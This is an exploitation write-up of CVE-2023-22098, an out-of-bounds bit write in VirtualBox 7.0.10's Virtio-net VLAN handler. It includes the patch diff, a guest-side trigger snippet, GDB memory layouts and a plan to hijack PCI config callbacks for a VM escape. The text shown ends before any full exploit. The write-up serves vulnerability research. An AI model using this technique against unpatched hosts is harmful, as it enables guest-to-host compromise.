Oracle VM VirtualBox 7.0.10 r158379 Escape

Hey VM Wizards, DiegoAltF4 here! Time to unleash some real virtualization magic!

In 2023, the outstanding security researcher Andy Nguyen discovered multiple vulnerabilities in Virtio-net for VirtualBox. All kudos to him.

In this post, I’ll take you through an in-depth analysis of CVE-2023-22098. We’ll begin by exploring the vulnerability and diving into some Virtio-net internals. Next, I’ll guide you through setting up a debugging environment, and we’ll wrap things up by developing a fully reliable PoC that escapes VirtualBox (it includes an ASLR bypass).

If you run into any issues or have questions, feel free to reach out to me on X!

Virtio-net

As mentioned in ¹: “In a nutshell, virtio is an abstraction layer over devices in a paravirtualized hypervisor. virtio was developed by RustyRussell in support of his own virtualization solution called lguest”.

Virtio was developed as a standardized, open interface to simplify the way virtual machines (VMs) access devices like block devices and network adapters. Virtio-net, a virtual ethernet card, is one of the most complex devices currently supported by virtio. As mentioned in ² “the communication between the driver in the guest OS and the device in the hypervisor is done through shared memory (that’s what makes virtio devices so efficient) using specialized data structures called virtqueues, which are actually ring buffers of buffer descriptors”.

The most common queues in Virtio-net are:

TX Queue (Transmit Queue): Used to send packets from the guest to the host.
RX Queue (Receive Queue): Used to receive packets from the host to the guest.

Additionally, Virtio-net includes a Control Virtqueue (CtrlQ), which is used to send control commands from the guest to the host. These commands allow the guest to modify or query the configuration of the Virtio-net device, for example, querying status in real-time.

As mentioned in ³: “To each guest we can associate a number of virtual CPUs (vCPUs) and the RX/TX queues are created per CPU so a more elaborated example with 4 vCPUs would look like this (removing the control plane for simplicity)”:

For example, when the guest wants to send a network packet to the host:

The guest places the packet in a shared memory buffer.
The guest creates a descriptor in the Descriptor Ring, pointing to the buffer holding the packet.
The guest places the index of the descriptor in the Available Ring, indicating that the buffer is ready for processing.
The guest notifies the host by writing to a notification register that a packet is ready for transmission.
The host reads the buffer, transmits the packet, and places the descriptor index in the Used Ring to indicate that processing is complete. Optionally, the host generates an interrupt to notify the guest that the buffer can be reused.

For much more information, I recommend checking ² ³ ⁴.

Vulnerability Analysis

Let’s start by taking a look at the Oracle Critical Patch Update Advisory - October 2023:

As you can see, the versions affected are prior to 7.0.12. Therefore, according to the Virtualbox Download Page, the latest vulnerable version is 7.0.10.

I like to start doing a simple diff to obtain a big picture of the situation. In this case, the principal file related to Virtio-net is src/VBox/Devices/Network/DevVirtioNet.cpp. Mainly two functions include significant changes:

static uint8_t virtioNetR3CtrlMultiQueue(PVIRTIONET pThis, PVIRTIONETCC pThisCC, PPDMDEVINS pDevIns, PVIRTIONET_CTRL_HDR_T pCtrlPktHdr, PVIRTQBUF pVirtqBuf)
{
    LogFunc(("[%s] Processing CTRL MQ command\n", pThis->szInst));
    uint16_t cVirtqPairs;
    switch(pCtrlPktHdr->uCmd)
    {
        case VIRTIONET_CTRL_MQ_VQ_PAIRS_SET:
        {
-            size_t cbRemaining = pVirtqBuf->cbPhysSend - sizeof(*pCtrlPktHdr);
+            size_t cbRemaining = pVirtqBuf->cbPhysSend;
 
-            AssertMsgReturn(cbRemaining > sizeof(cVirtqPairs),
+            AssertMsgReturn(cbRemaining >= sizeof(cVirtqPairs),
                ("DESC chain too small for VIRTIONET_CTRL_MQ cmd processing"), VIRTIONET_ERROR);
 
            /* Fetch number of virtq pairs from guest buffer */
            virtioCoreR3VirtqBufDrain(&pThis->Virtio, pVirtqBuf, &cVirtqPairs, sizeof(cVirtqPairs));
 
-            AssertMsgReturn(cVirtqPairs > VIRTIONET_MAX_QPAIRS,
+            AssertMsgReturn(cVirtqPairs <= VIRTIONET_MAX_QPAIRS,
                ("[%s] Guest CTRL MQ virtq pair count out of range [%d])\n", pThis->szInst, cVirtqPairs), VIRTIONET_ERROR);
 
            LogFunc(("[%s] Guest specifies %d VQ pairs in use\n", pThis->szInst, cVirtqPairs));
            pThis->cVirtqPairs = cVirtqPairs;
            break;
        }
        default:
            LogRelFunc(("Unrecognized multiqueue subcommand in CTRL pkt from guest\n"));
            return VIRTIONET_ERROR;
    }
 
[Truncated]
 
static uint8_t virtioNetR3CtrlVlan(PVIRTIONET pThis, PVIRTIONET_CTRL_HDR_T pCtrlPktHdr, PVIRTQBUF pVirtqBuf)
{
    LogFunc(("[%s] Processing CTRL VLAN command\n", pThis->szInst));
 
    uint16_t uVlanId;
-    size_t cbRemaining = pVirtqBuf->cbPhysSend - sizeof(*pCtrlPktHdr);
+    size_t cbRemaining = pVirtqBuf->cbPhysSend;
 
-    AssertMsgReturn(cbRemaining > sizeof(uVlanId),
+    AssertMsgReturn(cbRemaining >= sizeof(uVlanId),
        ("DESC chain too small for VIRTIONET_CTRL_VLAN cmd processing"), VIRTIONET_ERROR);
 
    /* Fetch VLAN ID from guest buffer */
    virtioCoreR3VirtqBufDrain(&pThis->Virtio, pVirtqBuf, &uVlanId, sizeof(uVlanId));
 
-    AssertMsgReturn(uVlanId > VIRTIONET_MAX_VLAN_ID,
+    AssertMsgReturn(uVlanId < VIRTIONET_MAX_VLAN_ID,
        ("%s VLAN ID out of range (VLAN ID=%u)\n", pThis->szInst, uVlanId), VIRTIONET_ERROR);
 
    LogFunc(("[%s] uCommand=%u VLAN ID=%u\n", pThis->szInst, pCtrlPktHdr->uCmd, uVlanId));
 
    switch (pCtrlPktHdr->uCmd)
    {
        case VIRTIONET_CTRL_VLAN_ADD:
            ASMBitSet(pThis->aVlanFilter, uVlanId);
            break;
        case VIRTIONET_CTRL_VLAN_DEL:
            ASMBitClear(pThis->aVlanFilter, uVlanId);
            break;
        default:
            LogRelFunc(("Unrecognized VLAN subcommand in CTRL pkt from guest\n"));
            return VIRTIONET_ERROR;
    }
    return VIRTIONET_OK;
}

The changes in AssertMsgReturn quickly caught my attention. Here’s how it’s implemented:

include/iprt/assert.h

# define AssertMsgReturn(expr, a, rc) \
    do { \
        if (RT_LIKELY(!!(expr))) \
        { /* likely */ } \
        else \
            return (rc); \
    } while (0)
#endif

Let’s break it down. The macro evaluates the expression expr:

If expr evaluates to true, nothing happens (the if block is empty).
If expr evaluates to false, the else block executes, returning the value rc.

Now, here’s an interesting bug: we can set cVirtqPairs > VIRTIONET_MAX_QPAIRS or uVlanId > VIRTIONET_MAX_VLAN_ID.

After considering the possibility of abusing cVirtqPairs > VIRTIONET_MAX_QPAIRS, I turned my focus to the second case (uVlanId > VIRTIONET_MAX_VLAN_ID) where it can be seen that the value of uVlanId is passed to the functions ASMBitSet and ASMBitClear. These functions do the following:

src/VBox/Runtime/common/asm/asm-fake.cpp

RTDECL(void) ASMBitSet(volatile void *pvBitmap, int32_t iBit)
{
    uint8_t volatile *pau8Bitmap = (uint8_t volatile *)pvBitmap;
    pau8Bitmap[iBit / 8] |= (uint8_t)RT_BIT_32(iBit & 7);
}

src/VBox/Runtime/common/asm/asm-fake.cpp

RTDECL(void) ASMBitClear(volatile void *pvBitmap, int32_t iBit)
{
    uint8_t volatile *pau8Bitmap = (uint8_t volatile *)pvBitmap;
    pau8Bitmap[iBit / 8] &= ~((uint8_t)RT_BIT_32(iBit & 7));
}

These functions rely on bitwise operations to manipulate the bits in the pThis->aVlanFilter array. Specifically:

ASMBitSet sets the bit in the bitmap.
ASMBitClear clears the bit.

This seemed more promising for exploitation, as it involves an out-of-bounds write in the VIRTIONET structure:

src/VBox/Devices/Network/DevVirtioNet.cpp

typedef struct VIRTIONET
{
    /** The core virtio state.   */
    VIRTIOCORE              Virtio;
 
    /** Virtio device-specific configuration */
    VIRTIONET_CONFIG_T      virtioNetConfig;
 
    /** Per device-bound virtq worker-thread contexts (eventq slot unused) */
    VIRTIONETWORKER         aWorkers[VIRTIONET_MAX_VIRTQS];
 
    /** Track which VirtIO queues we've attached to */
    VIRTIONETVIRTQ          aVirtqs[VIRTIONET_MAX_VIRTQS]; // out-of-bounds write
 
    /** PDM device Instance name */
    char                    szInst[16];
 
    [Truncated]
 
    /** MAC address obtained from the configuration. */
    RTMAC                   macConfigured;
 
    /** Bit array of VLAN filter, one bit per VLAN ID. */
    uint8_t                 aVlanFilter[VIRTIONET_MAX_VLAN_ID / sizeof(uint8_t)];
 
    /** Set if PDM leaf device at the network interface is starved for Rx buffers */
    bool volatile           fLeafWantsEmptyRxBufs;
 
    /** Number of packet being sent/received to show in debug log. */
    uint32_t                uPktNo;
 
    /** Flags whether VirtIO core is in ready state */
    uint8_t                 fVirtioReady;
 
    /** Resetting flag */
    uint8_t                 fResetting;
 
    [Truncated]
 
} VIRTIONET;

Setting up the lab

We’ll focus on developing the exploit for the debug version of VirtualBox, as it provides access to all symbols, making it easier to analyze and understand the exploitation process.

The source code for the latest vulnerable version can be obtained here. Both my host operating system and my guest operating system are Ubuntu 20.04.6 LTS.

This guide outlines the steps for building VirtualBox with debug symbols.

Once the required packages have been installed, the following commands need to be executed:

ln -s libX11.so.6    /usr/lib32/libX11.so
ln -s libXTrap.so.6  /usr/lib32/libXTrap.so
ln -s libXt.so.6     /usr/lib32/libXt.so
ln -s libXtst.so.6   /usr/lib32/libXtst.so
ln -s libXmu.so.6    /usr/lib32/libXmu.so
ln -s libXext.so.6   /usr/lib32/libXext.so

And finally:

chmod +x configure
chmod +x kBuild/bin/linux.amd64/k*
./configure --disable-hardening
source ./env.sh
kmk BUILD_TYPE=debug

ASAN can be enabled with:

kmk BUILD_TYPE=debug VBOX_WITH_GCC_SANITIZER=1

The virtual machine can be launched with the command:

./VirtualBoxVM --startvm <vm-name>

To configure the VM, we need to modify the network adapter type and select virtio-net:

Once configured, we can verify that everything is working correctly by running the following command:

lspci -v

If successful, the device should appear as shown below:

As mentioned in ¹:

When using PCI as a transport method, the device will present itself on the PCI bus with vendor 0x1af4 (Red Hat, Inc.) and device id 0x1003 (virtio console), as defined in the spec, so the kernel will detect it as it would do with any other PCI device.

Writing the exploit

Now that we know where the bug is located and have a functional debugging environment, we can start attempting to exploit the bug, with the goal of escaping from the virtual machine.

Triggering the bug

To trigger the bug, we need to reach the virtioNetR3CtrlVlan function and specify a value of uVlanId > VIRTIONET_MAX_VLAN_ID. The function responsible for calling virtioNetR3CtrlVlan is virtioNetR3Ctrl, which handles processing control commands from the guest. It’s invoked by worker for virtio-net control queue to process a queued control command buffer:

src/VBox/Devices/Network/DevVirtioNet.cpp

static void virtioNetR3Ctrl(PPDMDEVINS pDevIns, PVIRTIONET pThis, PVIRTIONETCC pThisCC,
                            PVIRTQBUF pVirtqBuf)
{
 
    [Truncated]
 
    /*
     * Allocate buffer and read in the control command
     */
    AssertMsgReturnVoid(pVirtqBuf->cbPhysSend >= sizeof(VIRTIONET_CTRL_HDR_T),
                        ("DESC chain too small for CTRL pkt header"));
 
    VIRTIONET_CTRL_HDR_T CtrlPktHdr; RT_ZERO(CtrlPktHdr);
    virtioCoreR3VirtqBufDrain(&pThis->Virtio, pVirtqBuf, &CtrlPktHdr,
                                RT_MIN(pVirtqBuf->cbPhysSend, sizeof(CtrlPktHdr)));
 
    Log7Func(("[%s] CTRL COMMAND: class=%d command=%d\n", pThis->szInst, CtrlPktHdr.uClass, CtrlPktHdr.uCmd));
 
    uint8_t uAck;
    switch (CtrlPktHdr.uClass)
    {
        case VIRTIONET_CTRL_RX:
            uAck = virtioNetR3CtrlRx(pThis, pThisCC, &CtrlPktHdr, pVirtqBuf);
            break;
        case VIRTIONET_CTRL_MAC:
            uAck = virtioNetR3CtrlMac(pThis, &CtrlPktHdr, pVirtqBuf);
            break;
        case VIRTIONET_CTRL_VLAN:
            uAck = virtioNetR3CtrlVlan(pThis, &CtrlPktHdr, pVirtqBuf);
            break;
        case VIRTIONET_CTRL_MQ:
            uAck = virtioNetR3CtrlMultiQueue(pThis, pThisCC, pDevIns, &CtrlPktHdr, pVirtqBuf);
            break;
        case VIRTIONET_CTRL_ANNOUNCE:
            uAck = VIRTIONET_OK;
            if (FEATURE_DISABLED(STATUS) || FEATURE_DISABLED(GUEST_ANNOUNCE))
            {
                LogFunc(("%s Ignoring CTRL class VIRTIONET_CTRL_ANNOUNCE.\n"
                         "VIRTIO_F_STATUS or VIRTIO_F_GUEST_ANNOUNCE feature not enabled\n", pThis->szInst));
                break;
            }
            if (CtrlPktHdr.uCmd != VIRTIONET_CTRL_ANNOUNCE_ACK)
            {
                LogFunc(("[%s] Ignoring CTRL class VIRTIONET_CTRL_ANNOUNCE. Unrecognized uCmd\n", pThis->szInst));
                break;
            }
#if FEATURE_OFFERED(STATUS)
            pThis->virtioNetConfig.uStatus &= ~VIRTIONET_F_ANNOUNCE;
#endif
            Log7Func(("[%s] Clearing VIRTIONET_F_ANNOUNCE in config status\n", pThis->szInst));
            break;
        default:
            LogRelFunc(("Unrecognized CTRL pkt hdr class (%d)\n", CtrlPktHdr.uClass));
            uAck = VIRTIONET_ERROR;
    }
 
    [Truncated]
}

The value of uClass from the CtrlPktHdr structure is evaluated in a switch statement. This uClass represents the type of control command being processed. Depending on its value, different functions are called to handle the specific control command.

Therefore, in our exploit, we can do the following:

exploit.c

 
[Truncated]
 
if (value & (1ULL << i))
    cmd = VIRTIONET_CTRL_VLAN_ADD;
else
    cmd = VIRTIONET_CTRL_VLAN_DEL;
 
// Setting the control header
dev->ctrl->hdr.class = VIRTIONET_CTRL_VLAN;
dev->ctrl->hdr.cmd   = cmd;
dev->ctrl->vlanId    = cpu_to_virtio16(vdev, offset * 8 + i);
 
// Initialize scatterlist
sg_init_one(&sgs[0], dev->ctrl, sizeof(struct command_entry) + 4);
psgs[0] = &sgs[0];
 
// Add the buffer to the control queue
virtqueue_add_sgs(dev->vqueues[2], psgs, 1, 0, dev, GFP_KERNEL);
 
// Kick queue to process the command
virtqueue_kick(dev->vqueues[2]);
 
// Wait for the command to be processed
while (!virtqueue_get_buf(dev->vqueues[2], &len) && !virtqueue_is_broken(dev->vqueues[2]))
{
    cpu_relax();
}
 
[Truncated]

Note: I added the +4 to satisfy the check cbRemaining > sizeof(cVirtqPairs). Something strange is happening with VBox, as it doesn’t seem to handle the size correctly.

If we set a breakpoint at src/VBox/Devices/Network/DevVirtioNet.cpp:2536, we can verify that the uClass has been correctly set. Additionally, we can set another breakpoint at src/VBox/Devices/Network/DevVirtioNet.cpp:2467 to check that the value of uVlanId is as expected:

Identifying structures in memory

Alright, knowing that we have an out-of-bounds write, what can we modify? To figure this out, we are going to try to identify the structures in memory, which will give us a much clearer understanding of our situation.

As we’ve already seen, the function virtioNetR3CtrlVlan attempts to modify pThis->aVlanFilter, which is of the type PVIRTIONET:

GDB

gef>  ptype /o pThis
type = struct VIRTIONET {
/*    0      |  2144 */    VIRTIOCORE Virtio;
/* 2144      |    10 */    VIRTIONET_CONFIG_T virtioNetConfig;
/* XXX  6-byte hole  */
/* 2160      |    48 */    VIRTIONETWORKER aWorkers[3];
/* 2208      |   120 */    VIRTIONETVIRTQ aVirtqs[3];
/* 2328      |    16 */    char szInst[16];
/* 2344      |     8 */    uint64_t fNegotiatedFeatures;
/* 2352      |     2 */    uint16_t cVirtqPairs;
/* 2354      |     2 */    uint16_t cInitializedVirtqPairs;
/* 2356      |     2 */    uint16_t cVirtqs;
/* 2358      |     2 */    uint16_t cWorkers;
/* 2360      |     2 */    uint16_t alignment;
/* XXX  2-byte hole  */
/* 2364      |     4 */    uint32_t uIsTransmitting;
/* 2368      |     4 */    uint32_t cMsLinkUpDelay;
/* 2372      |     4 */    uint32_t cMulticastFilterMacs;
/* 2376      |     4 */    uint32_t cUnicastFilterMacs;
/* XXX  4-byte hole  */
/* 2384      |     8 */    SUPSEMEVENT hEventRxDescAvail;
/* 2392      |   384 */    RTMAC aMacMulticastFilter[64];
/* 2776      |   384 */    RTMAC aMacUnicastFilter[64];
/* 3160      |     6 */    RTMAC rxFilterMacDefault;
/* 3166      |     6 */    RTMAC macConfigured;
/* 3172      |  4096 */    uint8_t aVlanFilter[4096];
/* 7268      |     1 */    volatile bool fLeafWantsEmptyRxBufs;
/* XXX  3-byte hole  */
/* 7272      |     4 */    uint32_t uPktNo;
/* 7276      |     1 */    uint8_t fVirtioReady;
/* 7277      |     1 */    uint8_t fResetting;
/* 7278      |     1 */    uint8_t fPromiscuous;
/* 7279      |     1 */    uint8_t fAllMulticast;
/* 7280      |     1 */    uint8_t fAllUnicast;
/* 7281      |     1 */    uint8_t fNoMulticast;
/* 7282      |     1 */    uint8_t fNoUnicast;
/* 7283      |     1 */    uint8_t fNoBroadcast;
/* 7284      |     4 */    VIRTIONETPKTHDRTYPE ePktHdrType;
/* 7288      |     2 */    uint16_t cbPktHdr;
/* 7290      |     1 */    bool fCableConnected;
/* 7291      |     1 */    bool fOfferLegacy;
/* XXX  4-byte hole  */
/* 7296      |     8 */    STAMCOUNTER StatReceiveBytes;
/* 7304      |     8 */    STAMCOUNTER StatTransmitBytes;
/* 7312      |     8 */    STAMCOUNTER StatReceiveGSO;
/* 7320      |     8 */    STAMCOUNTER StatTransmitPackets;
/* 7328      |     8 */    STAMCOUNTER StatTransmitGSO;
/* 7336      |     8 */    STAMCOUNTER StatTransmitCSum;
/* 7344      |    32 */    STAMPROFILE StatReceive;
/* 7376      |    32 */    STAMPROFILE StatReceiveStore;
/* 7408      |    40 */    STAMPROFILEADV StatTransmit;
/* 7448      |    32 */    STAMPROFILE StatTransmitSend;
/* 7480      |    32 */    STAMPROFILE StatRxOverflow;
/* 7512      |     8 */    STAMCOUNTER StatRxOverflowWakeup;
/* 7520      |     8 */    STAMCOUNTER StatTransmitByNetwork;
/* 7528      |     8 */    STAMCOUNTER StatTransmitByThread;
 
                             /* total size (bytes): 7536 */
                         } *

After this structure, we can observe that the PPDMCRITSECT structure is located following 16 bytes of padding.

GDB

gef>  x/20gx ((void*)pThis + 7536)
0x7fffb26b51b0:	0x0000000000000000	0x0000000000000000 ==> padding
0x7fffb26b51c0:	0xffffffff19790326	0xffffffffffffffff
0x7fffb26b51d0:	0x0000000000000001	0x0000000000000033
0x7fffb26b51e0:	0x00007fff9c351d60	0x0000000000000000
0x7fffb26b51f0:	0x00007fff9158d5e8	0x00007fffb26b3000
0x7fffb26b5200:	0x0000000000000101	0x0000000000000000
0x7fffb26b5210:	0x00007fff9c34e720	0x00007fffb26b51c0
0x7fffb26b5220:	0x0000000000000000	0x0000000000000000
0x7fffb26b5230:	0x0000000000000000	0x0000000000000000
0x7fffb26b5240:	0x0000000000000000	0xffffffffffffffff

GDB

gef>  ptype /o *(PPDMCRITSECT)0x7fffb26b51b0
/* offset    |  size */  type = union PDMCRITSECT {
/*               256 */    uint8_t padding[256];
 
                             /* total size (bytes):  256 */
                         }

Later, we come across the PDMPCIDEV structure:

GDB

gef>  x/20gx ((void*)pThis + 7536 + 16 + 256)
0x7fffb26b52c0:	0x0000001819391118	0x0000000090000100
0x7fffb26b52d0:	0x00007fffb07dc408	0x0000000000000000
0x7fffb26b52e0:	0x0000000000000000	0x0000000000000000
0x7fffb26b52f0:	0x0000000000000000	0x0000000000000000
0x7fffb26b5300:	0x00007fffb26b3000	0x0000010000000100
0x7fffb26b5310:	0x00007fffdc0002c0	0x00007fffb03a0df7
0x7fffb26b5320:	0x00007fffb03a10c8	0x0000000000000000
0x7fffb26b5330:	0x0000000000000000	0x0000000000000000
0x7fffb26b5340:	0x0000000000000000	0x0000000000000000
0x7fffb26b5350:	0xffffffffffffffff	0x0000000000000000

GDB

gef>   ptype /o *(PDMPCIDEV*)0x7fffb26b52c0
/* offset    |  size */  type = struct PDMPCIDEV {
/*    0      |     4 */    uint32_t u32Magic;
/*    4      |     4 */    uint32_t uDevFn;
/*    8      |     2 */    uint16_t cbConfig;
/*   10      |     2 */    uint16_t cbMsixState;
/*   12      |     2 */    uint16_t idxSubDev;
/*   14      |     2 */    uint16_t u16Padding;
/*   16      |     8 */    const char *pszNameR3;
/*   24      |     8 */    int (*pfnRegionLoadChangeHookR3)(PPDMDEVINS, PPDMPCIDEV, uint32_t, uint64_t, PCIADDRESSSPACE, PFNPCIIOREGIONOLDSETTER, PFNPCIIOREGIONSWAP);
/*   32      |    32 */    uint64_t au64Reserved[4];
/*   64      |   384 */    union {
/*               384 */        uint8_t padding[384];
/* XXX 320-byte padding  */
 
                                 /* total size (bytes):  384 */
                             } Int;
/*  448      |  4096 */    uint8_t abConfig[4096];
/* 4544      |     0 */    uint8_t abMsixState[];
 
                             /* total size (bytes): 4544 */
                         }

If we examine the definition of this structure, we find the most important and key member PDMPCIDEVINT s, which represents the internal data of the PDM PCI device:

include/VBox/vmm/pdmpcidev.h

typedef struct PDMPCIDEV
{
    /** @name Read only data.
     * @{
     */
    /** Magic number (PDMPCIDEV_MAGIC). */
    uint32_t                u32Magic;
    /** PCI device number [11:3] and function [2:0] on the pci bus.
     * @sa VBOX_PCI_DEVFN_MAKE, VBOX_PCI_DEVFN_FUN_MASK, VBOX_PCI_DEVFN_DEV_SHIFT */
    uint32_t                uDevFn;
 
    [Truncated]
 
    /** Internal data. */
    union
    {
#ifdef PDMPCIDEVINT_DECLARED
        PDMPCIDEVINT        s;
#endif
        uint8_t             padding[0x180];
    } Int;
 
    /** PCI config space.
     * This is either 256 or 4096 in size.  In the latter case it may be
     * followed by a MSI-X state area. */
    uint8_t                 abConfig[4096];
    /** The MSI-X state data.  Optional. */
    RT_FLEXIBLE_ARRAY_EXTENSION
    uint8_t                 abMsixState[RT_FLEXIBLE_ARRAY];
} PDMPCIDEV;

Let’s verify it:

GDB

gef>  x/20gx ((void*)pThis + 7536 + 16 + 256 + 64)
0x7fffb26b5300:	0x00007fffb26b3000	0x0000010000000100
0x7fffb26b5310:	0x00007fffdc0002c0	0x00007fffb03a0df7
0x7fffb26b5320:	0x00007fffb03a10c8	0x0000000000000000
0x7fffb26b5330:	0x0000000000000000	0x0000000000000000
0x7fffb26b5340:	0x0000000000000000	0x0000000000000000
0x7fffb26b5350:	0xffffffffffffffff	0x0000000000000000
0x7fffb26b5360:	0x000000000000d020	0x0000000000000020
0x7fffb26b5370:	0x000000000000003a	0x0000000100000005
0x7fffb26b5380:	0x0000000000000000	0x0000000000000000
0x7fffb26b5390:	0x0000000000000000	0x0000000000000000

GDB

gef>   p *(PDMPCIDEVINT*)((void*)pThis + 7536 + 16 + 256 + 64)
{
    pDevInsR3 = 0x7fffb26b3000,
    idxDevCfg = 0x0,
    fReassignableDevNo = 0x1,
    fReassignableFunNo = 0x0,
    bPadding0 = 0x0,
    idxPdmBus = 0x0,
    fRegistered = 0x1,
    idxSubDev = 0x0,
    pBusR3 = 0x7fffdc0002c0,
    pfnConfigRead = 0x7fffb03a0df7 <virtioR3PciConfigRead(PPDMDEVINS, PPDMPCIDEV, uint32_t, unsigned int, uint32_t*)>,
    pfnConfigWrite = 0x7fffb03a10c8 <virtioR3PciConfigWrite(PPDMDEVINS, PPDMPCIDEV, uint32_t, unsigned int, uint32_t)>,
    pfnBridgeConfigRead = 0x0,
    pfnBridgeConfigWrite = 0x0,
    fFlags = 0x0,
    uIrqPinState = 0x0,
    u8MsiCapOffset = 0x0,
    u8MsiCapSize = 0x0,
    u8MsixCapOffset = 0x0,
    u8MsixCapSize = 0x0,
    cbMsixRegion = 0x0,
    offMsixPba = 0x0,
    abPadding2 = "\000\000\000\000\000\000\000",
    hMmioMsix = 0xffffffffffffffff,
    pvPciBusPtrR3 = 0x0,
 
    [Truncated]

In fact, by inspecting PPDMDEVINSR3 pDevInsR3, we can confirm that the apPciDevs[0] member points to the PDMPCIDEV structure we had identified earlier:

GDB

gef>   p *(PDMDEVINSR3*)0x7fffb26b3000
{
    u32Version = 0xff820040,
    iInstance = 0x0,
    cbRing3 = 0xd000,
    fR0Enabled = 0x1,
    fRCEnabled = 0x0,
    afReserved = {0x0, 0x0},
    pHlpR3 = 0x7fffd103ab20 <g_pdmR3DevHlpTrusted>,
    pvInstanceDataR3 = 0x7fffb26b3440,
    pvInstanceDataForR3 = 0x7fffb26b3180,
    pCritSectRoR3 = 0x7fffb26b51c0,
    pReg = 0x7fffb07dc400 <g_DeviceVirtioNet>,
    pCfg = 0x7fff9c00dff0,
    IBase = {
    pfnQueryInterface = 0x0
    },
    fTracing = 0x0,
    idTracing = 0x10,
    pDevInsForRCR3 = 0x7fffb26b3400,
    pDevInsForRC = 0x0,
    pvInstanceDataForRCR3 = 0x0,
    cbPciDev = 0xa1c0,
    cPciDevs = 0x1,
    apPciDevs = {0x7fffb26b52c0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0},
    pDevInsR0RemoveMe = 0xffffa26e050f5000,
    pvInstanceDataR0 = 0xffffa26e050f6440,
    pvInstanceDataRC = 0x0,
    au32Padding = {0x0 <repeats 11 times>},
    Internal = {
    padding = "\000\000k\262\377\177\000\000\000\000\000\000\000\000\000\000\300w\035\234\377\177\000\000@H5\234\377\177\000\000\000\000\000\000\000\000\000\000 \335\000\234\377\177\000\000\000@\002\320\377\177\000\000\377\377\377\377\377\377\377\377", '\000' <repeats 16 times>, "(\000\000\000V\000\020\000\r", '\000' <repeats 54 times>
    },
    achInstanceData = "\337\035;\260\377\177\000"
}

Exploitation Strategy

The members pfnConfigRead and pfnConfigWrite in the PDMPCIDEVINT struct caught my attention. These are actually callbacks. Therefore, we can control the execution flow by modifying these callbacks. However, we have a problem: we don’t have any memory leaks.

To obtain the leaks, I remembered that with the lspci command, we can query the device’s data. Therefore, it’s retrieving the information somehow. Specifically, the function responsible for this is virtioR3PciConfigRead:

src/VBox/Devices/VirtIO/VirtioCore.cpp

static DECLCALLBACK(VBOXSTRICTRC) virtioR3PciConfigRead(PPDMDEVINS pDevIns, PPDMPCIDEV pPciDev,
                                                        uint32_t uAddress, unsigned cb, uint32_t *pu32Value)
{
    PVIRTIOCORE   pVirtio   = PDMINS_2_DATA(pDevIns, PVIRTIOCORE);
    PVIRTIOCORECC pVirtioCC = PDMINS_2_DATA_CC(pDevIns, PVIRTIOCORECC);
    RT_NOREF(pPciDev);
 
    if (uAddress == pVirtio->uPciCfgDataOff)
    {
     /* See comments in PCI Cfg capability initialization (in capabilities setup section of this code) */
        struct virtio_pci_cap *pPciCap = &pVirtioCC->pPciCfgCap->pciCap;
        uint32_t uLength = pPciCap->uLength;
 
        Log7Func((" pDevIns=%p pPciDev=%p uAddress=%#x%s cb=%u uLength=%d, bar=%d\n",
                     pDevIns, pPciDev, uAddress,  uAddress < 0x10 ? " " : "", cb, uLength, pPciCap->uBar));
 
        if (  (uLength != 1 && uLength != 2 && uLength != 4)
            || pPciCap->uBar != VIRTIO_REGION_PCI_CAP)
        {
            ASSERT_GUEST_MSG_FAILED(("Guest read virtio_pci_cfg_cap.pci_cfg_data using mismatching config. "
                                     "Ignoring\n"));
            *pu32Value = UINT32_MAX;
            return VINF_SUCCESS;
        }
 
        VBOXSTRICTRC rcStrict = virtioMmioRead(pDevIns, pVirtio, pPciCap->uOffset, pu32Value, cb);
        Log7Func((" Guest read virtio_pci_cfg_cap.pci_cfg_data, bar=%d, offset=%d, length=%d, result=0x%x -> %Rrc\n",
                     pPciCap->uBar, pPciCap->uOffset, uLength, *pu32Value, VBOXSTRICTRC_VAL(rcStrict)));
        return rcStrict;
    }
    Log7Func((" pDevIns=%p pPciDev=%p uAddress=%#x%s cb=%u pu32Value=%p\n",
                 pDevIns, pPciDev, uAddress,  uAddress < 0x10 ? " " : "", cb, pu32Value));
    return VINF_PDM_PCI_DO_DEFAULT;
}

The first two lines are quite important:

src/VBox/Devices/VirtIO/VirtioCore.cpp

PVIRTIOCORE   pVirtio   = PDMINS_2_DATA(pDevIns, PVIRTIOCORE);
PVIRTIOCORECC pVirtioCC = PDMINS_2_DATA_CC(pDevIns, PVIRTIOCORECC);

The definition of the macros is as follows:

include/VBox/vmm/pdmins.h

/** @def PDMINS_2_DATA
 * Gets the shared instance data for a PDM device, USB device, or driver instance.
 * @note For devices using PDMDEVINS_2_DATA is highly recommended.
 */
#define PDMINS_2_DATA(pIns, type)       ( (type)(pIns)->CTX_SUFF(pvInstanceData) )

include/VBox/vmm/pdmins.h

/** @def PDMINS_2_DATA_CC
 * Gets the current context instance data for a PDM device, USB device, or driver instance.
 * @note For devices using PDMDEVINS_2_DATA_CC is highly recommended.
 */
#define PDMINS_2_DATA_CC(pIns, type)    ( (type)(void *)&(pIns)->achInstanceData[0] )

Therefore, pVirtio will point to pvInstanceDataR3. However, we cannot directly modify the contents of pvInstanceDataR3.

GDB

gef>  ptype /o PDMDEVINSR3
/* offset    |  size */  type = struct PDMDEVINSR3 {
/*    0      |     4 */    uint32_t u32Version;
/*    4      |     4 */    uint32_t iInstance;
/*    8      |     4 */    uint32_t cbRing3;
/*   12      |     1 */    bool fR0Enabled;
/*   13      |     1 */    bool fRCEnabled;
/*   14      |     2 */    bool afReserved[2];
/*   16      |     8 */    PCPDMDEVHLPR3 pHlpR3;
/*   24      |     8 */    RTR3PTR pvInstanceDataR3;
/*   32      |     8 */    RTR3PTR pvInstanceDataForR3;
/*   40      |     8 */    PPDMCRITSECT pCritSectRoR3;
/*   48      |     8 */    PCPDMDEVREG pReg;
/*   56      |     8 */    PCFGMNODE pCfg;
/*   64      |     8 */    PDMIBASE IBase;
/*   72      |     4 */    uint32_t fTracing;
/*   76      |     4 */    uint32_t idTracing;
/*   80      |     8 */    PDMDEVINSRC *pDevInsForRCR3;
/*   88      |     8 */    RTRGPTR pDevInsForRC;
/*   96      |     8 */    RTR3PTR pvInstanceDataForRCR3;
/*  104      |     4 */    uint32_t cbPciDev;
/*  108      |     4 */    uint32_t cPciDevs;
/*  112      |    64 */    PDMPCIDEV *apPciDevs[8];
/*  176      |     8 */    RTHCUINTPTR pDevInsR0RemoveMe;
/*  184      |     8 */    RTR0PTR pvInstanceDataR0;
/*  192      |     4 */    RTRCPTR pvInstanceDataRC;
/*  196      |    44 */    uint32_t au32Padding[11];
/*  240      |   144 */    union {
/*               144 */        uint8_t padding[144];
 
                                 /* total size (bytes):  144 */
                             } Internal;
